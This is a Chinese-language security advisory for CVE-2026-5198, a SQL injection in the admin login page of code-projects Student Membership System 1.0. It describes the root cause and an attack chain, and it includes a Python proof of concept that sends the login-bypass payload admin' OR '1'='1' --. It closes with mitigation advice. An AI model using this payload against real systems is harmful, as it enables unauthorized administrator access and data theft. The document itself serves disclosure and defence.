CVE-2026-5198 Student Membership System SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-5198

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Student Membership System

漏洞概述

code-projects Student Membership System 1.0版本被发现存在严重的安全漏洞。该漏洞位于管理员登录组件的/admin/index.php文件中，由于程序未对用户输入的username和password参数进行严格的过滤处理，导致攻击者可以通过构造恶意的SQL语句进行注入攻击。攻击者无需认证即可远程利用此漏洞，成功利用可能导致数据库敏感信息泄露、数据被篡改或删除。由于漏洞利用代码已公开披露，风险较高，需紧急处理。

技术细节

该漏洞属于经典的SQL注入漏洞，影响范围覆盖code-projects Student Membership System 1.0版本。漏洞产生的根本原因在于/admin/index.php文件处理登录逻辑时，直接将前端传递的username和password参数拼接至SQL查询语句中，未使用参数化查询或有效的输入验证机制。攻击者可以通过发送包含SQL元字符（如单引号、注释符）的POST请求到登录接口，改变SQL语句的原始逻辑。CVSS 3.1评分为7.3，攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需用户交互（UI:N）且无需权限（PR:N）。利用此漏洞，攻击者可以绕过身份验证直接登录后台，或者通过布尔盲注、联合查询等方式窃取数据库中的用户信息。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标系统为code-projects Student Membership System 1.0，并定位到后台登录页面/admin/index.php。

STEP 2

2. 漏洞探测

攻击者在登录表单的username和password字段中输入特殊字符（如单引号），观察服务器响应以判断是否存在SQL注入点。

STEP 3

3. 构造攻击载荷

攻击者构造特定的SQL注入Payload（例如：admin' OR '1'='1），旨在绕过密码验证逻辑或提取数据库数据。

STEP 4

4. 执行利用

攻击者发送包含恶意Payload的HTTP POST请求，服务器执行恶意SQL语句，导致登录验证被绕过。

STEP 5

5. 获取权限

攻击者成功以管理员身份进入后台，获取系统控制权及敏感数据访问权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-5198: SQL Injection in Student Membership System 1.0
# Target: /admin/index.php

import requests

def check_vuln(target_url):
    login_url = f"{target_url}/admin/index.php"
    # Payload attempting SQL Injection to bypass login
    payload = {
        "username": "admin' OR '1'='1' --",
        "password": "password"
    }
    
    try:
        response = requests.post(login_url, data=payload, timeout=10)
        # Check if login was successful (adjust keywords based on actual response)
        if response.status_code == 200 and ("dashboard" in response.text.lower() or "logout" in response.text.lower()):
            print("[+] Vulnerability confirmed! Login bypassed.")
            return True
        else:
            print("[-] Target not vulnerable or response changed.")
            return False
    except Exception as e:
        print(f"[!] Error occurred: {e}")
        return False

if __name__ == "__main__":
    target = "http://localhost" # Replace with actual target
    check_vuln(target)

影响范围

code-projects Student Membership System 1.0

防御指南

临时缓解措施

在未获得官方补丁前，建议在Web应用防火墙（WAF）中添加针对该登录接口的SQL注入防护规则，拦截包含恶意SQL语法的请求。此外，建议限制后台管理页面的网络访问，仅允许受信任的IP地址访问，或暂时关闭系统对外服务直到修复完成。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5198
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5198
3 Details https://www.cvedetails.com/cve/CVE-2026-5198/
4 VulDB https://vuldb.com/cve/CVE-2026-5198
5 Link https://code-projects.org/
6 Link https://github.com/maidangdang1/CVE/issues/4
7 Link https://vuldb.com/submit/780403
8 Link https://vuldb.com/vuln/354296
9 Link https://vuldb.com/vuln/354296/cti